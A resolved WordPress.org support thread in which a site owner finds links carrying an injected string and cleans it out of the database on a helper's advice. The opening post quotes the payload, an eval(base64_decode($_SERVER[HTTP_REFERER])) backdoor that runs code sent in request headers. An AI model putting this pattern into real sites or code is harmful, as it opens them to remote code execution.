WordPress.org

Support

Support » How-To and Troubleshooting » [Resolved] Hacked? Links are broken

[Resolved] Hacked? Links are broken

  • geoff67
    Member

    @geoff67

    I’ve been trying to fix this for 4 hours now and can’t seem to figure out what’s wrong.

    Dynamically generated links (posts, comments, etc) have the following appended to their ends.
    %&({$eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    I’ve looked at countless hacked threads, php injection solutions, Googled everything I can think of, and I’ve done all of the steps to Hardening WP.

    Any idea what’s going on, or where to look next?

Viewing 6 replies - 1 through 6 (of 6 total)
  • geoff67
    Member

    @geoff67

    Oh, and here’s the link to the website: shafr.org.

    Hummm…I’ve typically seen that in the source code, but it looks like yours may be in the database. Have you looked in wp-config.php to make sure it’s clean?

    geoff67
    Member

    @geoff67

    wp-config.php is normal. DB stuff at top, keys, table prefix, lang and the wp-settings.php line.

    I would suggest dumping your db and searching it. Typically, this code will be exactly the same, so once you find one instance of it, you can do a search/replace to clean it, then drop your original tables and import your cleaned db. Of course, this will not fix the problem that allowed this in the first place, but it should get you an operational blog back.

    geoff67
    Member

    @geoff67

    Thanks for the suggestion. I found 38 instances, in 4 variations. Uploading new db now.

    Do you know what would’ve caused this? I don’t want another SQL bug.

    geoff67
    Member

    @geoff67

    Amazing. That fixed it. Thanks so much, figaro.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘[Resolved] Hacked? Links are broken’ is closed to new replies.